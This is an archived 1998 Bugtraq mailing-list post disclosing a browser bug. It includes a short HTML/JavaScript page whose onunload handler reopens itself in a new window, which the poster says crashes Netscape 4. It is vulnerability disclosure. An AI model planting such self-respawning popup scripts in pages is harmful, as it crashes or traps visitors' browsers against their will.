Re: More browser bugs.

From: Matt Drown (panzerat_private)
Date: Fri Mar 27 1998 - 19:34:25 PST

  • Next message: Ryan: "wtmpx utility for solaris"

    Perhaps there needs to a bugtraq-browsers, or a bugtraq-javascript....
    www.dhp.com/~panzer/evil.html crashes netscape4 on SunOS and NT without a
    problem.  IE4 deals properly.
    
    <html><head>
    <title> Evil </title>
    <script language="JavaScript">
     var exit=true;
     function xit()
     {
     if (exit)
     open("http://www.dhp.com/~panzer/evil.html","DisplayWindow","width=50,height=20");
     }
    </script>
    </head>
    <body onunload="xit()">
    <blink>Evil</blink>
    </body>
    
    I don't know javascript, I'm just pasting things together after being
    annoyed with banner advertisements that didn't go away.  When I figured
    out what they were doing, I tried this.
    --
    -Matt Drown     -- Privacy, Anonyminity, & Security -- DataHaven Project
     panzerat_private -- Shell and Web accounts           -- http://www.dhp.com/
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:47:27 PDT